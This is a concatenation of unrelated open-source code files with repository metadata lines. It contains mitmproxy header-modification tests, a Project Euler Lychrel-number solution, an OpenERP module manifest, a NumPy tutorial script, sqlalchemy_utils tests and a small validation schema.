parse_modify_spec("/[/two", True)
class TestModifyHeaders:
def test_configure(self):
mh = ModifyHeaders()
with taddons.context(mh) as tctx:
with pytest.raises(Exception, match="Cannot parse modify_headers"):
tctx.configure(mh, modify_headers=["/"])
tctx.configure(mh, modify_headers=["/foo/bar/voing"])
def test_modify_headers(self):
mh = ModifyHeaders()
with taddons.context(mh) as tctx:
tctx.configure(
mh,
modify_headers=[
"/~q/one/two",
"/~s/one/three"
]
)
f = tflow.tflow()
f.request.headers["one"] = "xxx"
mh.request(f)
assert f.request.headers["one"] == "two"
f = tflow.tflow(resp=True)
f.response.headers["one"] = "xxx"
mh.response(f)
assert f.response.headers["one"] == "three"
tctx.configure(
mh,
modify_headers=[
"/~s/one/two",
"/~s/one/three"
]
)
f = tflow.tflow(resp=True)
f.request.headers["one"] = "xxx"
f.response.headers["one"] = "xxx"
mh.response(f)
assert f.response.headers.get_all("one") == ["two", "three"]
tctx.configure(
mh,
modify_headers=[
"/~q/one/two",
"/~q/one/three"
]
)
f = tflow.tflow()
f.request.headers["one"] = "xxx"
mh.request(f)
assert f.request.headers.get_all("one") == ["two", "three"]
# test removal of existing headers
tctx.configure(
mh,
modify_headers=[
"/~q/one/",
"/~s/one/"
]
)
f = tflow.tflow()
| f.request.headers["one"] = "xxx"
mh.request(f)
assert "one" not in f.request.headers
f = tflow.tflow(resp=True)
f.response.headers["one"] = "xxx"
mh.response(f)
assert "one" not in f.respons | e.headers
tctx.configure(
mh,
modify_headers=[
"/one/"
]
)
f = tflow.tflow()
f.request.headers["one"] = "xxx"
mh.request(f)
assert "one" not in f.request.headers
f = tflow.tflow(resp=True)
f.response.headers["one"] = "xxx"
mh.response(f)
assert "one" not in f.response.headers
# test modifying a header that is also part of the filter expression
# https://github.com/mitmproxy/mitmproxy/issues/4245
tctx.configure(
mh,
modify_headers=[
"/~hq ^user-agent:.+Mozilla.+$/user-agent/Definitely not Mozilla ;)"
]
)
f = tflow.tflow()
f.request.headers["user-agent"] = "Hello, it's me, Mozilla"
mh.request(f)
assert "Definitely not Mozilla ;)" == f.request.headers["user-agent"]
@pytest.mark.parametrize("take", [True, False])
def test_taken(self, take):
mh = ModifyHeaders()
with taddons.context(mh) as tctx:
tctx.configure(mh, modify_headers=["/content-length/42"])
f = tflow.tflow()
if take:
f.response = tresp()
mh.request(f)
assert (f.request.headers["content-length"] == "42") ^ take
f = tflow.tflow(resp=True)
if take:
f.kill()
mh.response(f)
assert (f.response.headers["content-length"] == "42") ^ take
class TestModifyHeadersFile:
def test_simple(self, tmpdir):
mh = ModifyHeaders()
with taddons.context(mh) as tctx:
tmpfile = tmpdir.join("replacement")
tmpfile.write("two")
tctx.configure(
mh,
modify_headers=["/~q/one/@" + str(tmpfile)]
)
f = tflow.tflow()
f.request.headers["one"] = "xxx"
mh.request(f)
assert f.request.headers["one"] == "two"
@pytest.mark.asyncio
async def test_nonexistent(self, tmpdir):
mh = ModifyHeaders()
with taddons.context(mh) as tctx:
with pytest.raises(Exception, match="Cannot parse modify_headers .* Invalid file path"):
tctx.configure(
mh,
modify_headers=["/~q/foo/@nonexistent"]
)
tmpfile = tmpdir.join("replacement")
tmpfile.write("bar")
tctx.configure(
mh,
modify_headers=["/~q/foo/@" + str(tmpfile)]
)
tmpfile.remove()
f = tflow.tflow()
f.request.content = b"foo"
mh.request(f)
await tctx.master.await_log("could not read")
|
arturh85/projecteuler | python/src/problem055.py | Python | mit | 2,561 | 0.001562 | # coding=utf-8
'''
Problem 55
24 October 2013
If we take 47, reverse and add, 47 + 74 = 121, which is palindromic.
Not all numbers produce palindromes so quickly. For example,
349 + 943 = 1292,
1292 + 2921 = 4213
4213 + 3124 = 7337
That is, 349 took three iterations to arrive at a palindrome.
Although no one has proved it yet, it is thought that some numbers, like 196, never produce a palindrome. A number that never forms a palindrome through the reverse and add process is called a Lychrel number. Due to the theoretical nature of these numbers, and for the purpose of this problem, we shall assume that a number is Lychrel until proven otherwise. In addition you are given that for every number below ten-thousand, it will either (i) become a palindrome in less than fifty iterations, or, (ii) no one, with all the computing power that exists, has managed so far to map it to a palindrome. In fact, 10677 is the first nu | mber to be shown to require over fifty iterations before producing a palindrome: 4668731596684224866951378664 (53 | iterations, 28-digits).
Surprisingly, there are palindromic numbers that are themselves Lychrel numbers; the first example is 4994.
How many Lychrel numbers are there below ten-thousand?
NOTE: Wording was modified slightly on 24 April 2007 to emphasise the theoretical nature of Lychrel numbers.
----------------------------------------------------------
Created on 19.02.2015
@author: ahallmann
'''
import unittest
import timeit
from problem004 import is_palindrome
def step(n):
return n + int(str(n)[::-1])
def is_lycherel_number(n):
for i in range(30):
n = step(n)
if is_palindrome(str(n)):
return False
return True
def solve():
cnt = 0
for n in range(1, 10000):
if is_lycherel_number(n):
cnt += 1
return cnt
class Test(unittest.TestCase):
def test_sample(self):
self.assertEqual(121, step(47))
self.assertFalse(is_lycherel_number(47))
self.assertFalse(is_lycherel_number(349))
self.assertTrue(is_lycherel_number(196))
pass
def test_answer(self):
self.assertEqual(249, solve())
pass
# -----------------------------------------
def run():
return solve()
if __name__ == '__main__':
unittest.main()
# if __name__ == '__main__':
# t = timeit.Timer("run()", "from __main__ import run")
# count = 1
# print(str(t.timeit(count)) + " seconds for " + str(count) + " runs")
|
VitalPet/c2c-rd-addons | c2c_reporting_tools_chricar/__terp__.py | Python | agpl-3.0 | 2,752 | 0.008727 | # -*- coding: utf-8 -*-
##############################################################################
#
# Copyright (c) Camptocamp SA
# Author: Arnaud WÃŒst
#
#
# This file is part of the c2c_report_tools module.
#
#
# WARNING: This program as such is intended to be used by professional
# programmers who take the whole responsability of assessing all potential
# consequences resulting from its eventual inadequacies and bugs
# End users who are looking for a ready-to-use solution with commercial
# garantees and support are strongly adviced to contract a Free Software
# Service Company
#
# This program is Free Software; you can redistribute it and/or
# modify it under the terms of the GNU General Public License
# as published by the Free Software Foundation; either version 2
# of the License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA 02111-1307, USA.
#
##############################################################################
{
"name" : "c2c Reporting Tools. A library that provide a new way to create clean reports efficiently",
"version" : "5.0",
"author" : "Camptocamp",
"category" : "Generic Modules/Reporting",
"description": """ This module offer a growing collection of objects to create simple and advanced reports in a new way of doing.
You can create powerful reports with a few lines of python code and nothing else. (no sxw, rml or xml)
This module follow multiple goals:
- To accelerate report creation by creating reusable pieces of code (one line of code to create standard header and footer)
- To accelerate report generation (processing) | by getting ride of uncecessary parsing and transfo | rmations (direct python to pdf generation)
- To improve reporting capabilities by getting ride of uncomplete parsers and limited middle technologies
- To make reports designs more uniform
For exemples of use, have a look at c2c_planning_management. Our first module based on this tool.
""",
"website": "http://www.camptocamp.com",
"depends" : [],
"init_xml" : [
],
"data" : [
],
"active": False,
"installable": True
}
|
abhishekkr/tutorials_as_code | talks-articles/machine-learning/google-courses/prework--numpy-ultraquick-tutorial.py | Python | mit | 2,051 | 0.006338 | """
## NumPy UltraQuick Tutorial
[source](https://colab.research.google.com/github/google/eng-edu/blob/main/ml/cc/exercises/numpy_ultraquick_tutorial.ipynb?utm_source=mlcc)
> create/manipulate vectors and matrices
"""
## import module as
import numpy as np
## populate array with specific numbers
### 'np.array' to create NumPy matrix with hand-picked values
one_dim_array = np.array([1.3, 3.7, 4.3, 5.6, 7.9])
print(one_dim_array)
two_dim_array = np.array([[1.3, 3.7], [4.3, 5.6], [6.4, 7.9]])
print(two_dim_array)
### can populate matrix with all zeros or one using 'np.zeros' or 'np.ones'
## populate arrays with number sequences using 'np.arange'
seq_int = np.arange(3, 9)
print(seq_int)
## populate arrays with random numbers
### 'randint' for integers
rand_ints_between_10_and_50 = np.random.randint(low=10, high=51, size=(5))
print(rand_ints_between_10_and_50)
### 'random' for floats between 0.0 & 1.0
rand_floats_between_0_and_1 = np.random.random([5])
print(rand_floats_between_0_and_1)
## math operations on NumPy operands
### 'broadcasting' is expanding shape of an operand in matrix math operation
### to dimensions compatible for that operation
rand_floats_between_1_and_2 = rand_floats_between_0_and_1 + 1.0
rand_floats_between_100_and_200 = rand_floats_between_1_a | nd_2 * 100.0
"""
Task.1 Create a Linear Dataset
to create a simple dataset consisting single feature and label
* assign int sequence from 6 to 20 to a NumPy array name 'feature'
* assign 15 values to NumPy array named 'label' as: 'label = (3) (feature) + 4'; as first value be '(3) (6) + 4 = 22'
"""
feature = np.arange(6, 21)
print(featu | re)
label = (feature * 3) + 4.0
print(label)
"""
Task.2 Add some noise to the dataset
to mae dataset realistic; insert random noise to each element of 'label' array
* modify each value assigned to 'label' by adding different random float between -2/+2 without 'broadcasting'
instead create noise array having same dimension
"""
noise = (np.random.random([15]) * 4)
print(noise)
label = label + noise
print(label)
|
cheungpat/sqlalchemy-utils | tests/functions/test_analyze.py | Python | bsd-3-clause | 936 | 0 | from sqlalchemy_utils import analyze
from tests import TestCase
class TestAnalyzeWithPostgres(TestCase):
dns = 'postgres://postgres@localhost/s | qlalchemy_utils_test'
def test_runtime(self):
query = self.session.query(self.Article)
assert analyze(self.connection, query).runtime
def test_node_types_w | ith_join(self):
query = (
self.session.query(self.Article)
.join(self.Article.category)
)
analysis = analyze(self.connection, query)
assert analysis.node_types == [
u'Hash Join', u'Seq Scan', u'Hash', u'Seq Scan'
]
def test_node_types_with_index_only_scan(self):
query = (
self.session.query(self.Article.name)
.order_by(self.Article.name)
.limit(10)
)
analysis = analyze(self.connection, query)
assert analysis.node_types == [u'Limit', u'Index Only Scan']
|
andreymal/mini_fiction | mini_fiction/validation/news.py | Python | gpl-3.0 | 1,013 | 0.000987 | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
from mini_fiction.validation.utils import bool_coerce, safe_string_coerce, safe_string_multiline_coerce
NEWS_ITEM = {
'name': {
'type': 'string',
'coerce': safe_string_coerce,
'required': True,
'minlength': 1,
'maxlength': 64,
'regex': r'^[A-z\_\-\.][A-z0-9\_\-\.]*$',
},
'title': {
'type': 'string',
'coerce': safe_string_coerce,
'required': F | alse,
'minlength': 1,
'maxlength': 192,
'default': '',
},
'content': {
'type': 'string',
'coerce': safe_string_multiline_coerce,
'required': True,
'minlength': 0,
'maxlength': 65535, |
},
'is_template': {
'type': 'boolean',
'coerce': bool_coerce,
'required': False,
'default': False,
},
'show': {
'type': 'boolean',
'coerce': bool_coerce,
'required': False,
'default': False,
},
}
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.